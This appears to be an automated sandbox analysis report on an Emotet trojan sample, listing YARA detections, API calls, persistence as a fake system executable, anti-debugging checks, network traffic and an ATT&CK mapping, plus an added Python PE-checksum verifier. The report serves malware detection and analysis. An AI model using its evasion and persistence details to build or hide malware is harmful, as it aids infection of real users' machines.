              Source: 2.2.Websocket.exe.60052e.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.Websocket.exe.60052e.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.5f052e.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.5f052e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.Websocket.exe.60279e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 2.2.Websocket.exe.610000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.evad.winEXE@4/0@0/97
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_0040E170: GetLastError,FormatMessageW,_wprintf
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_0040E220: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_0040E220: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00608660: CreateServiceW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_0040F510: GetUserNameW,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,CloseHandle,wsprintfW,_memset,OpenProcess,CloseHandle,wsprintfW,wsprintfW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00604F50: ChangeServiceConfig2W,GetProcessHeap,HeapFree,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,GetTickCount,GetProcessHeap,HeapFree,RtlFreeHeap
Source: C:\Users\user\Desktop\ExeFile (356).exe | Command line arguments (0_2_0040FA80), in order of occurrence: win32app, Run, win32app, BUTTON, BUTTON, BUTTON, win32app, Edit, BUTTON, Cancel, BUTTON
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Command line arguments (2_2_0040FA80), in order of occurrence: win32app, Run, win32app, BUTTON, BUTTON, BUTTON, win32app, Edit, BUTTON, Cancel, BUTTON
Source: ExeFile (356).exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ExeFile (356).exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\ExeFile (356).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ExeFile (356).exe | ReversingLabs: Detection: 97%
Source: unknown | Process created: C:\Users\user\Desktop\ExeFile (356).exe "C:\Users\user\Desktop\ExeFile (356).exe"
Source: C:\Users\user\Desktop\ExeFile (356).exe | Process created: C:\Windows\SysWOW64\provcore\Websocket.exe "C:\Windows\SysWOW64\provcore\Websocket.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\ExeFile (356).exe | Process created: C:\Windows\SysWOW64\provcore\Websocket.exe "C:\Windows\SysWOW64\provcore\Websocket.exe"
Source: C:\Users\user\Desktop\ExeFile (356).exe | Sections loaded: apphelp.dll, version.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, userenv.dll, wininet.dll, wtsapi32.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, uxtheme.dll, propsys.dll, windows.staterepositoryps.dll, windows.fileexplorer.common.dll, ntmarta.dll, profapi.dll
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Sections loaded: apphelp.dll, version.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, userenv.dll, wininet.dll, wtsapi32.dll, windows.storage.dll, wldp.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msasn1.dll, kernel.appcore.dll, uxtheme.dll, sspicli.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll
Source: C:\Windows\System32\svchost.exe | Sections loaded: kernel.appcore.dll, licensemanagersvc.dll, licensemanager.dll, clipc.dll, cryptsp.dll, wldp.dll
Source: C:\Users\user\Desktop\ExeFile (356).exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: ExeFile (356).exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ExeFile (356).exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ExeFile (356).exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ExeFile (356).exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ExeFile (356).exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ExeFile (356).exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ExeFile (356).exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: A:\WindowsProcessManager-master\WindowsProcessManager-master\Release\TaskMgr.pdb | source: ExeFile (356).exe
Source: Binary string: vfwwdm32.pdb | source: ExeFile (356).exe
Source: ExeFile (356).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ExeFile (356).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ExeFile (356).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ExeFile (356).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ExeFile (356).exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00415F77: LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: ExeFile (356).exe | Static PE information: real checksum: 0x744f8 should be: 0x6d651
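The "real checksum ... should be" observation above is the sandbox recomputing the PE header CheckSum field and comparing it with the stored value; a mismatch is typical of binaries that were patched or packed after linking, as the Emotet loader here was. The following is an added example, written for this page and not part of the Joe Sandbox report or its tooling: it reimplements the imagehlp CheckSumMappedFile algorithm (32-bit sum with end-around carry, fold to 16 bits, add file length, skipping the CheckSum field itself) so the check can be reproduced on any file. The minimal header returned by build_sample_pe() and the values derived from it are constructed for illustration and are not a loadable image.

```python
"""Added example: recompute and verify the PE optional-header CheckSum field.
Usage: python pe_checksum.py <file.exe>, or import and call verify_pe_checksum()."""
import struct
import sys


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum for a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # PE signature (4) + IMAGE_FILE_HEADER (20) + CheckSum at offset 64 of the optional header
    return e_lfanew + 4 + 20 + 64


def compute_pe_checksum(data: bytes) -> int:
    """imagehlp algorithm: sum the file as little-endian 32-bit words with end-around
    carry, skip the CheckSum field, fold to 16 bits, then add the unpadded length."""
    skip = checksum_field_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)      # pad only for the word loop
    checksum = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        checksum += struct.unpack_from("<I", padded, i * 4)[0]
        if checksum >= 1 << 32:                   # fold the carry back in
            checksum = (checksum & 0xFFFFFFFF) + (checksum >> 32)
    checksum = (checksum & 0xFFFF) + (checksum >> 16)
    checksum += checksum >> 16
    return (checksum & 0xFFFF) + len(data)


def stored_pe_checksum(data: bytes) -> int:
    """The CheckSum value the linker (or whoever patched the file) left in the header."""
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def verify_pe_checksum(data: bytes):
    """Return (stored, computed, matches). A stored value of 0 means no checksum was
    set at all, which is common for ordinary unsigned user-mode binaries."""
    stored, computed = stored_pe_checksum(data), compute_pe_checksum(data)
    return stored, computed, stored == computed


def build_sample_pe(length: int = 160, checksum: int = 0) -> bytes:
    """Constructed test input: MZ stub, e_lfanew=0x40, PE signature and zero-filled
    headers, just large enough to contain the CheckSum field (assumption, not a real file)."""
    buf = bytearray(length)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, 0x40 + 88, checksum)
    return bytes(buf)


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        stored, computed, ok = verify_pe_checksum(f.read())
    print(f"real checksum: {stored:#x} should be: {computed:#x} -> {'OK' if ok else 'MISMATCH'}")
```

Because the CheckSum field is excluded from the sum, writing the correct value back does not change the computed result, which is what makes the field verifiable in place; note that the loader only enforces this checksum for drivers and certain system DLLs, so a mismatch is a triage signal, not a reason the sample would fail to run.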
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00411EC5: push ecx; ret (0_2_00411ED8)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605C50: push ecx; mov dword ptr [esp], 00008F8Eh (0_2_00605C51)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605CF0: push ecx; mov dword ptr [esp], 00000E88h (0_2_00605CF1)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605CD0: push ecx; mov dword ptr [esp], 0000A465h (0_2_00605CD1)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605C90: push ecx; mov dword ptr [esp], 00002224h (0_2_00605C91)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605D70: push ecx; mov dword ptr [esp], 0000B4A4h (0_2_00605D71)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605D20: push ecx; mov dword ptr [esp], 0000C239h (0_2_00605D21)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605DE0: push ecx; mov dword ptr [esp], 0000272Ah (0_2_00605DE1)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605DB0: push ecx; mov dword ptr [esp], 00001190h (0_2_00605DB1)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605E40: push ecx; mov dword ptr [esp], 0000C126h (0_2_00605E41)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605EE0: push ecx; mov dword ptr [esp], 00006DE4h (0_2_00605EE1)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00605EA0: push ecx; mov dword ptr [esp], 00008285h (0_2_00605EA1)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F7A7E: push ecx; mov dword ptr [esp], 00006DE4h (0_2_005F7A7F)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F786E: push ecx; mov dword ptr [esp], 0000A465h (0_2_005F786F)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005FE015: push 0000003Bh; ret (0_2_005FE01A)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F7A3E: push ecx; mov dword ptr [esp], 00008285h (0_2_005F7A3F)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F782E: push ecx; mov dword ptr [esp], 00002224h (0_2_005F782F)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F788E: push ecx; mov dword ptr [esp], 00000E88h (0_2_005F788F)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F78BE: push ecx; mov dword ptr [esp], 0000C239h (0_2_005F78BF)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F794E: push ecx; mov dword ptr [esp], 00001190h (0_2_005F794F)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F797E: push ecx; mov dword ptr [esp], 0000272Ah (0_2_005F797F)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F790E: push ecx; mov dword ptr [esp], 0000B4A4h (0_2_005F790F)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F79DE: push ecx; mov dword ptr [esp], 0000C126h (0_2_005F79DF)
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F77EE: push ecx; mov dword ptr [esp], 00008F8Eh (0_2_005F77EF)
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00411EC5: push ecx; ret (2_2_00411ED8)
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00615C50: push ecx; mov dword ptr [esp], 00008F8Eh (2_2_00615C51)
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00615CF0: push ecx; mov dword ptr [esp], 00000E88h (2_2_00615CF1)
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00615CD0: push ecx; mov dword ptr [esp], 0000A465h (2_2_00615CD1)
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00615C90: push ecx; mov dword ptr [esp], 00002224h (2_2_00615C91)
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00615D70: push ecx; mov dword ptr [esp], 0000B4A4h (2_2_00615D71)
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00615D20: push ecx; mov dword ptr [esp], 0000C239h (2_2_00615D21)

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\ExeFile (356).exe | Executable created and started: C:\Windows\SysWOW64\provcore\Websocket.exe
Source: C:\Users\user\Desktop\ExeFile (356).exe | PE file moved: C:\Windows\SysWOW64\provcore\Websocket.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\ExeFile (356).exe | File opened: C:\Windows\SysWOW64\provcore\Websocket.exe:Zone.Identifier read attributes | delete
Source: unknown | Network traffic detected: HTTP traffic on port 62409 -> 7080

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ExeFile (356).exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess | graph_0-24129
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\ExeFile (356).exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_006038B0: GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_006138B0: _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose
Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2550427830.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\ExeFile (356).exe | API call chain: ExitProcess graph end node | graph_0-24393
Source: C:\Users\user\Desktop\ExeFile (356).exe | API call chain: ExitProcess graph end node | graph_0-24264
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | API call chain: ExitProcess graph end node | graph_2-24049
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | API call chain: ExitProcess graph end node | graph_2-24119
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_0040E930: LdrFindResource_U,LdrAccessResource
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00411C5F: _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00415F77: LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00604D00: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00603E40: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F0456: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F689E: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F095E: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_005F59DE: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_020E1030: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00614D00: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00613E40: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00600456: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_0060689E: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_0060095E: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_006059DE: mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00731030: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00603060: GetProcessHeap,RtlAllocateHeap,PathFindExtensionW
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00411C5F: _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_004100FB: IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00413E30: SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00411C5F: _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_004100FB: IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_00413E30: SetUnhandledExceptionFilter
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_00414640: GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function 0_2_0040F510: GetUserNameW,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,CloseHandle,wsprintfW,_memset,OpenProcess,CloseHandle,wsprintfW,wsprintfW,Process32NextW,CloseHandle
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function 2_2_006152E0: RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo
Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.Websocket.exe.60279e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ExeFile (356).exe.5f279e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ExeFile (356).exe.5f279e.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ExeFile (356).exe.600000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Websocket.exe.60052e.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Websocket.exe.60052e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ExeFile (356).exe.5f052e.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ExeFile (356).exe.5f052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Websocket.exe.60279e.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Websocket.exe.610000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              ATT&CK matrix, listed per tactic (the number preceding a technique is the count shown with it in the report):

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
              Execution: 2 Command and Scripting Interpreter; 1 Service Execution; 11 Native API; Cron; Launchd; Scheduled Task; Systemd Timers
              Persistence: 2 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
              Privilege Escalation: 1 Access Token Manipulation; 2 Windows Service; 1 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items
              Defense Evasion: 12 Masquerading; 1 Access Token Manipulation; 1 Process Injection; 1 Hidden Files and Directories; 1 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion
